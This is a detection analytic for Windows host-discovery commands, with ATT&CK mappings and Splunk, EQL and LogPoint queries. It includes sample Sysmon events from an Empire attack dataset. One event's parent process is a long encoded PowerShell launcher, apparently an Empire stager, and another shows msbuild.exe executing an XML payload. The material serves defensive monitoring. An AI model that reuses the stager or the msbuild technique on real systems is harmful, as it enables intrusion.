When entering on a host for the first time, an adversary may try to discover information about the host. There are several built-in Windows commands that can be used to learn about the software configurations, active users, administrators, and networking configuration. These commands should be monitored to identify when an adversary is learning information about the system and environment. The information returned may impact choices an adversary can make when establishing persistence, escalating privileges, or moving laterally.

Because these commands are built in, they may be run frequently by power users or even by normal users. Thus, an analytic looking at this information should have well-defined white- or blacklists, and should consider looking at an anomaly detection approach, so that this information can be learned dynamically.

Within the built-in Windows Commands:

  • hostname
  • ipconfig
  • net
  • quser
  • qwinsta
  • sc with flags query, queryex, qc
  • systeminfo
  • tasklist
  • dsquery
  • whoami

Note dsquery is only pre-existing on Windows servers.

ATT&CK Detections

Technique Subtechnique(s) Tactic(s) Level of Coverage
Account Discovery Local Account, Domain Account Discovery Moderate
Permission Groups Discovery Local Groups, Domain Groups Discovery Moderate
System Network Configuration Discovery N/A Discovery Moderate
System Information Discovery N/A Discovery Moderate
System Owner/User Discovery N/A Discovery Moderate
Process Discovery N/A Discovery Moderate
System Service Discovery N/A Discovery Moderate

D3FEND Techniques

ID Name
D3-PSA Process Spawn Analysis

Data Model References

Object Action Field
process create command_line
process create exe

Implementations

Pseudocode

To be effective in deciphering malicious and benign activity, the full command line is essential. Similarly, having information about the parent process can help with making decisions and tuning to an environment.

process = search Process:Create
info_command = filter process where (
 exe == "hostname.exe" or
 exe == "ipconfig.exe" or
 exe == "net.exe" or
 exe == "quser.exe" or
 exe == "qwinsta.exe" or
 exe == "sc" and (command_line match " query" or command_line match " qc")) or
 exe == "systeminfo.exe" or
 exe == "tasklist.exe" or
 exe == "whoami.exe"
)
output info_command

Splunk, Sysmon native

Splunk version of the above pseudocode search.

index=__your_sysmon_index__ EventCode=1 (Image="C:\\Windows\\*\\hostname.exe" OR Image="C:\\Windows\\*\\ipconfig.exe" OR Image="C:\\Windows\\*\\net.exe" OR Image="C:\\Windows\\*\\quser.exe" OR Image="C:\\Windows\\*\\qwinsta.exe" OR (Image="C:\\Windows\\*\\sc.exe" AND (CommandLine="* query *" OR CommandLine="* qc *")) OR Image="C:\\Windows\\*\\systeminfo.exe" OR Image="C:\\Windows\\*\\tasklist.exe" OR Image="C:\\Windows\\*\\whoami.exe")|stats values(Image) as "Images" values(CommandLine) as "Command Lines" by ComputerName

Eql, EQL native

EQL version of the above pseudocode search.

process where subtype.create and
  (process_name == "hostname.exe" or process_name == "ipconfig.exe" or process_name == "net.exe" or process_name == "quser.exe" process_name == "qwinsta.exe" or process_name == "systeminfo.exe" or process_name == "tasklist.exe" or process_name == "whoami.exe" or (process_name == "sc.exe" and (command_line == "* query *" or command_line == "* qc *")))

Logpoint, LogPoint native

LogPoint version of the above pseudocode.

norm_id=WindowsSysmon event_id=1 (image in ["*\hostname.exe", "*\ipconfig.exe", "*\net.exe", "*\quser.exe", "*\qwinsta.exe", "*\systeminfo.exe", "*\tasklist.exe", "*\whoami.exe"] OR (image="*\sc.exe" command IN ["* query *", "* qc *"))

True Positives

Mordor (sysmon) - net.exe

Sysmon net.exe event from the Mordor Empire Net Start dataset.

Full Event
Event Snippet
{
	"@event_date_creation": "2019-05-18T22:01:37.466Z",
	"@timestamp": "2019-05-18T22:01:37.485Z",
	"@version": "1",
	"action": "processcreate",
	"event_id": 1,
	"file_company": "Microsoft Corporation",
	"file_description": "Net Command",
	"file_product": "Microsoft® Windows® Operating System",
	"file_version": "10.0.17763.1 (WinBuild.160101.0800)",
	"fingerprint_process_command_line_mm3": 2031073884,
	"hash_imphash": "57F0C47AE2A1A2C06C8B987372AB0B07",
	"hash_md5": "AE61D8F04BCDE8158304067913160B31",
	"hash_sha1": "4F4970C3545972FEA2BC1984D597FC810E6321E0",
	"hash_sha256": "25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369",
	"host_name": "hr001.shire.com",
	"level": "Information",
	"log_ingest_timestamp": "2019-05-18T22:01:37.485Z",
	"log_name": "Microsoft-Windows-Sysmon/Operational",
	"opcode": "Info",
	"process_command_line": "\"c:\\windows\\system32\\net.exe\" start",
	"process_current_directory": "c:\\windows\\system32\\",
	"process_guid": "03ba39f5-80c1-5ce0-0000-0010d7602302",
	"process_id": "6416",
	"process_integrity_level": "Medium",
	"process_name": "net.exe",
	"process_parent_command_line": "\"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe\" -nop -sta -w 1 -enc  sqbgacgajabqafmavgblahiacwbjae8abgbuaeeaygbmagualgbqafmavgblahiacwbjag8abgauae0ayqbkae8acgagac0arwblacaamwapahsajaa4aeqaqqbjadeapqbbafiarqbmaf0algbbafmacwbfae0aqgbmahkalgbhaguavabuafkauabfacgajwbtahkacwb0aguabqauae0ayqbuageazwblag0azqbuahqalgbbahuadabvag0ayqb0agkabwbuac4avqb0agkababzaccakqauaciarwbfafqargbjaeuayabsaeqaigaoaccaywbhagmaaablagqarwbyag8adqbwafaabwbsagkaywb5afmazqb0ahqaaqbuagcacwanacwajwboaccakwanag8abgbqahuaygbsagkaywasafmadabhahqaaqbjaccakqa7aekargaoacqaoabeaeeaqwaxackaewakadmamgbladqarga9acqaoabkaeeaqwaxac4arwblahqavgbbagwadqblacgajabuahuatabmackaowbjaeyakaakadmamgbfadqargbbaccauwbjahiaaqbwahqaqganacsajwbsag8aywbraewabwbnagcaaqbuagcajwbdackaewakadmamgbladqargbbaccauwbjahiaaqbwahqaqganacsajwbsag8aywbraewabwbnagcaaqbuagcajwbdafsajwbfag4ayqbiagwazqbtagmacgbpahaadabcaccakwanagwabwbjagsatabvagcazwbpag4azwanaf0apqawadsajaazadiarqa0agyawwanafmaywbyagkacab0aeiajwaraccababvagmaawbmag8azwbnagkabgbnaccaxqbbaccarqbuageaygbsaguauwbjahiaaqbwahqaqgbsag8aywbraekabgb2ag8aywbhahqaaqbvag4atabvagcazwbpag4azwanaf0apqawah0ajab2ageabaa9afsaqwbvagwatablagmavabjag8abgbtac4arwbfag4arqbsagkaqwauaeqasqbjafqaaqbpag4aqqbyahkawwbtahqacgbpag4arwasafmaeqbtahqazqbnac4atwbiaeoazqbjafqaxqbdadoaogbuaguavwaoackaowakahyayqbmac4aqqbkagqakaanaeuabgbhagiabablafmaywbyagkacab0aeiajwaraccababvagmaawbmag8azwbnagkabgbnaccalaawackaowakafyaqqbmac4aqqbeaeqakaanaeuabgbhagiabablafmaywbyagkacab0aeiababvagmaawbjag4adgbvagmayqb0agkabwbuaewabwbnagcaaqbuagcajwasadaakqa7acqamwayaeuanabmafsajwbiaesarqbzaf8atabpaemaqqbmaf8atqbbaemasabjae4arqbcafmabwbmahqadwbhahiazqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwbcafaabwb3aguacgbtaggazqbsagwaxabtagmacgbpahaadabcaccakwanagwabwbjagsatabvagcazwbpag4azwanaf0apqakafyaqqbsah0arqbmafmarqb7afsauwbdahiaaqbwafqaqgbmae8aywbraf0algaiaecazqbuaeyaaqbfagaababkaciakaanahmaaqbnag4ayqb0ahuacgblahmajwasaccatganacsajwbvag4auab1agiababpagmalabtahqayqb0agkaywanackalgbtaeuadabwaeeatabvaguakaakag4avqbmaewalaaoae4azqb3ac0atwbiagoarqbdafqaiabdae8ababmaeuaqwbuaekabwboahmalgbhaeuabgblafiasqbdac4asabbafmasabtaguadabbahmadabyaekabgbnaf0akqapah0ajabsaeuarga9afsaugblagyaxqauaeeacwbtaguatqbcaewaeqauaecazqbuafqawqbwaeuakaanafmaeqbzahqazqbtac4atqbhag4ayqbnaguabqblag4adaauaeeadqb0ag8abqbhahqaaqbvag4algbbag0acwbpafuadabpagwacwanackaowakafiazqbgac4arwblahqargbpaeuababkacgajwbhag0acwbpaekabgbpahqargbhagkabablagqajwasaccatgbvag4auab1agiababpagmalabtahqayqb0agkaywanackalgbtaeuavabwaeeababvaeuakaakae4adqbsagwalaakahqacgb1aeuakqa7ah0aowbbafmaeqbtafqarqbnac4atgblahqalgbtaeuacgbwagkaqwbfafaatwbjag4adabnageatgbbaecarqbsaf0aoga6aeuaeabqaeuaqwbuadeamaawaematwbuafqaaqbuafuarqa9adaaowakadqamwbfagyamwa9ae4arqb3ac0atwbiaeoarqbjafqaiabtahkacwb0aeuabqauae4azqb0ac4avwblagiaqwbsaekazqboahqaowakahuapqanae0abwb6agkababsagealwa1ac4amaagacgavwbpag4azabvahcacwagae4avaagadyalgaxadsaiabxae8avwa2adqaowagafqacgbpagqazqbuahqalwa3ac4amaa7acaacgb2adoamqaxac4amaapacaababpagsazqagaecazqbjagsabwanadsawwbtahkacwb0aguabqauae4azqb0ac4auwblahiadgbpagmazqbqag8aaqbuahqatqbhag4ayqbnaguacgbdadoaogbtaguacgb2aguacgbdaguacgb0agkazgbpagmayqb0aguavgbhagwaaqbkageadabpag8abgbdageababsagiayqbjagsaiaa9acaaewakahqacgb1aguafqa7acqanaazaguazgazac4asabfageazablafiacwauaeeazabeacgajwbvahmazqbyac0aqqbnaguabgb0accalaakahuakqa7acqanaazaguargazac4asablageazablahiacwauaeearabkacgajwbvahmazqbyac0aqqbnaguabgb0accalaakahuakqa7acqanaazaguazgazac4auabyag8aeab5ad0awwbtafkauwb0aguatqauae4azqb0ac4avwbfaeiaugblaheadqblahmavabdadoaogbeaeuargbhafuabab0afcazqbcafaaugbpafgaeqa7acqanaazaguazgazac4auabsag8aeab5ac4aqwbsaguazabfag4avabpageababtacaapqagafsauwbzahmavablag0algboaguadaauaemacgblagqarqbuahqasqbbaewaqwbhagmaaablaf0aoga6aeqarqbgaeeadqbmahqatgblafqadwbpafiaswbdahiarqbeaguabgb0agkayqbmahmaowakafmaywbyagkacab0adoauabyag8aeab5acaapqagacqanaazaguazgazac4auabyag8aeab5adsajablad0awwbtahkacwbuaguabqauafqazqb4afqalgbfag4aywbvagqaaqboaecaxqa6adoaqqbtaemasqbjac4arwbfafqaqgbzahqarqbtacgajwb+agsakgbfaeyauwbqahiaoaalahgadwblaeoangboahwauablac4azgb7afuatgbnaegadqbkahaanqb5ag0ajwapadsajabsad0aewakaeqalaakaesapqakaeeacgbhahmaowakafmapqawac4algayaduanqa7adaalgauadianqa1ahwajqb7acqasga9acgajabkacsajabtafsajabfaf0akwakaesawwakaf8ajqakaesalgbdae8adqbuafqaxqapacuamga1adyaowakafmawwakaf8axqasacqauwbbacqasgbdad0ajabtafsajabkaf0alaakafmawwakaf8axqb9adsajabeahwajqb7acqasqa9acgajabjacsamqapacuamga1adyaowakaegapqaoacqasaaracqauwbbacqasqbdackajqayaduanga7acqauwbbacqasqbdacwajabtafsajabiaf0apqakafmawwakaegaxqasacqauwbbacqasqbdadsajabfac0aygb4ae8acgakafmawwaoacqauwbbacqasqbdacsajabtafsajabiaf0akqaladianqa2af0afqb9adsajabzaguacga9acqakabbafqazqbyahqalgbfae4aqwbvaeqasqboaecaxqa6adoavqboagkaywbpaeqazqauaecarqb0afmadabyagkatgbhacgawwbdae8atgb2aguacgbuaf0aoga6aeyaugbvag0aqgbbahmarqa2adqauwb0afiaaqboagcakaanageaqqbcadaaqqbiafeaqqbjaeeaqgb6aeearabvaeeatab3aeeadgbbaeqarqbbae0aqqbbahuaqqbeaeeaqqbmagcaqqb4aeearabbaeeatabnaeeaeabbaeqaqqbbae4azwbbad0ajwapackakqa7acqadaa9accalwbuaguadwbzac4acaboahaajwa7acqanaazaeuazgazac4asablaeeazabfahiauwauaeeazabeacgaigbdag8abwbragkazqaiacwaigbiafkadgbsafaasgbnag0acwbrahkatgbgafqaawa9ahoabwbqadaadgbdae0atwbsafyazqbyadiargbjafmazgbpaeyaawbsaemaagbsahiaoabjad0aigapadsajabeageavabhad0ajaa0admarqbmadmalgbeae8adwbuagwabwbbaeqarabbafqayqaoacqauwblahiakwakafqakqa7acqaaqb2ad0ajabeageavabbafsamaauac4amwbdadsajabeaeeadabbad0ajabkaeeavabbafsanaauac4ajabkaeeadabbac4abablae4arwb0aegaxqa7ac0aagbvagkabgbbaemasabhahiawwbdaf0akaamacaajabsacaajabeaeeadabhacaakaakaekavgaracqaswapackafabjaeuawaa=",
	"process_parent_guid": "03ba39f5-6e79-5ce0-0000-001032d21002",
	"process_parent_id": "5204",
	"process_parent_name": "powershell.exe",
	"process_parent_path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
	"process_path": "c:\\windows\\system32\\net.exe",
	"provider_guid": "5770385f-c22a-43e0-bf4c-06f5698ffbd9",
	"record_number": "2266298",
	"source_name": "Microsoft-Windows-Sysmon",
	"task": "Process Create (rule: ProcessCreate)",
	"thread_id": 3144,
	"type": "wineventlog",
	"user_account": "shire\\pgustavo",
	"user_domain": "shire",
	"user_logon_guid": "03ba39f5-6e77-5ce0-0000-00208da31002",
	"user_logon_id": 34644877,
	"user_name": "pgustavo",
	"user_reporter_domain": "NT AUTHORITY",
	"user_reporter_name": "SYSTEM",
	"user_reporter_sid": "S-1-5-18",
	"user_reporter_type": "User",
	"user_session_id": "1",
	"version": 5
}

Mordor (sysmon) - whoami.exe

Sysmon whoami.exe event from the Mordor Empire Net Start dataset.

Full Event
Event Snippet
{
	"@event_date_creation": "2019-05-18T21:40:45.541Z",
	"@timestamp": "2019-05-18T21:40:45.584Z",
	"@version": "1",
	"action": "processcreate",
	"event_id": 1,
	"file_company": "Microsoft Corporation",
	"file_description": "whoami - displays logged on user information",
	"file_product": "Microsoft® Windows® Operating System",
	"file_version": "10.0.17763.1 (WinBuild.160101.0800)",
	"fingerprint_process_command_line_mm3": 2899086180,
	"hash_imphash": "7FF0758B766F747CE57DFAC70743FB88",
	"hash_md5": "43C2D3293AD939241DF61B3630A9D3B6",
	"hash_sha1": "47D7864D26FC67E0D60391CBF170D33DA518C322",
	"hash_sha256": "1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A",
	"host_name": "it001.shire.com",
	"level": "Information",
	"log_ingest_timestamp": "2019-05-18T21:40:45.584Z",
	"log_name": "Microsoft-Windows-Sysmon/Operational",
	"process_command_line": "\"c:\\windows\\system32\\whoami.exe\"",
	"process_current_directory": "c:\\windows\\tasks\\",
	"process_guid": "aa6b4a20-7bdd-5ce0-0000-001047551d00",
	"process_id": "2088",
	"process_integrity_level": "High",
	"process_name": "whoami.exe",
	"process_parent_command_line": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\msbuild.exe  c:\\windows\\tasks\\pshell.xml",
	"process_parent_guid": "aa6b4a20-7b8d-5ce0-0000-001028031c00",
	"process_parent_id": "5656",
	"process_parent_name": "msbuild.exe",
	"process_parent_path": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\msbuild.exe",
	"process_path": "c:\\windows\\system32\\whoami.exe",
	"provider_guid": "5770385f-c22a-43e0-bf4c-06f5698ffbd9",
	"record_number": "2994778",
	"source_name": "Microsoft-Windows-Sysmon",
	"task": "Process Create (rule: ProcessCreate)",
	"thread_id": 2136,
	"type": "wineventlog",
	"user_account": "shire\\pgustavo",
	"user_domain": "shire",
	"user_logon_guid": "aa6b4a20-7b8c-5ce0-0000-002071cb1b00",
	"user_logon_id": 1821553,
	"user_name": "pgustavo",
	"user_reporter_domain": "NT AUTHORITY",
	"user_reporter_name": "SYSTEM",
	"user_reporter_sid": "S-1-5-18",
	"user_reporter_type": "User",
	"user_session_id": "0",
	"version": 5
}